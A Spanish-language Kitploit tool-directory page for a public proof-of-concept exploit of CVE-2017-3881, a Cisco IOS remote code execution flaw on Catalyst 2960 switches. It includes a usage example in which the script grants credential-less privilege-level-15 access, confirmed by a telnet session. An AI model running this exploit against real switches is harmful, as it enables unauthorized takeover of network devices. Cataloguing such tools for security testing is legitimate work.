Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-3881 — crédito a artkond | Kitploit
Herramientas/GitHubGitHub/1337g/cve-2017-3881
Seguridad de Sistemas EmbebidosFrameworks de ExploitsAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de Penetración
GitHub1337g/cve-2017-3881

CVE-2017-3881

crédito a artkond

Ver Repositorio
22hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2017-3881 Ejecución remota de código en Cisco IOS

Este repositorio contiene código de Prueba de Concepto para explotar la vulnerabilidad de ejecución remota de código divulgada por Cisco Systems el 17 de marzo de 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Descripción

El artículo sobre el exploit está disponible aquí - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

El código del exploit RCE está disponible para el modelo de switch Cisco Catalyst 2960. Este exploit depende del firmware. Se admiten dos versiones de firmware:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

El código de denegación de servicio está disponible como un módulo de Ruby de Metasploit. Esto debería funcionar para la mayoría de los switches mencionados en el aviso de Cisco (se necesita confirmación).

Ejemplo de uso

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Autor

Artem Kondratenko https://twitter.com/artkond

Descargar herramienta